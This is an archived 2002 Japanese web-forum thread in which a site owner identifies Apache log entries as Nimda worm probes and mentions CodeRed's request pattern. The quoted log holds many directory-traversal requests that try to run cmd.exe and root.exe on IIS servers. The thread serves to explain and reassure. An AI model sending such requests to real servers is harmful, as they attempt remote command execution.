Top過去ログ目次掲示板

作成日:2002年08月17日 作成:おやじ
掲示板で過去に質問された内容です。

No.79 Apacheのlogについて

No.79 投稿時間:2002年08月17日(Sat) 15:14 投稿者名:ken URL:
タイトル:Apacheのlogについて

ようやく、公開できたのですが、このほど、Apacheのログに意味不明なログがたくさんあるので何なのか分かったらでいいので教えてください。IPアドレスは伏せておきますが、
[17/Aug/2002:12:56:26 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:29 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:12:56:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[17/Aug/2002:12:56:25 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[17/Aug/2002:12:56:25 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:12:56:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:12:56:26 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:12:56:26 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:12:56:26 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:14:43:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[17/Aug/2002:14:43:18 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[17/Aug/2002:14:43:18 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:14:43:18 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:14:43:18 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:14:43:18 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:14:43:19 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:14:43:19 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
このようなログがたくさん並んでいます。
これは、一部です。
これは何なのでしょうか?

No.80 投稿時間:2002年08月17日(Sat) 16:36 投稿者名:おやじ URL:http://www.aconus.com/~oyaji/
タイトル:Re: Apacheのlogについて

> ようやく、公開できたのですが、このほど、Apacheのログに意味不明なログがたくさんあるので何なのか分かったらでいいので教えてください。IPアドレスは伏せておきますが、
> [17/Aug/2002:12:56:26 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

 鷹の巣さんの掲示板でも同様の質問があり、回答していますが、これがかの有名なIISに取りつく
ウイルスNimdaです。Apacheにとっては、単なるゴミアクセスですので心配ありません。
 もうひとつ、そのうちくるでしょうが、CodeRedがありますが、これは、

 GET /default.ida?NNNNNNNNN・・・・・

と非常にたくさんの「N」又は「?」の連続したアクセスです。最近は、CodeRedはあまりこないと
鷹の巣さんの掲示板には書いたのですが、その後、なぜか結構くるようになりました。これも、
Apacheにとっては単なるゴミアクセスですから心配はありません。
 ただ、ログが汚れてウザイなら、おやじのWWWサーバ(Linux版)のページに他のファイルにログ
ったり、ログらない方法がありますので、参考にしてください。ただ、CodeRedはパターンマッチ
がうまくいかずに引っ掛けられません。1発なのと少ないのであきらめています。

No.81 投稿時間:2002年08月17日(Sat) 16:51 投稿者名:ken URL:
タイトル:Re^2: Apacheのlogについて

ありがとうございます!
ずっと疑問に思っていたログが悪影響を及ぼすものでないと分かってほっとしています。
ちなみに、IISに取りつくウイルスNimdaの数は1日十数回あるのですが、CodeRedも1日数回あります。
どうもありがとうございました。


掲示板▲頁先頭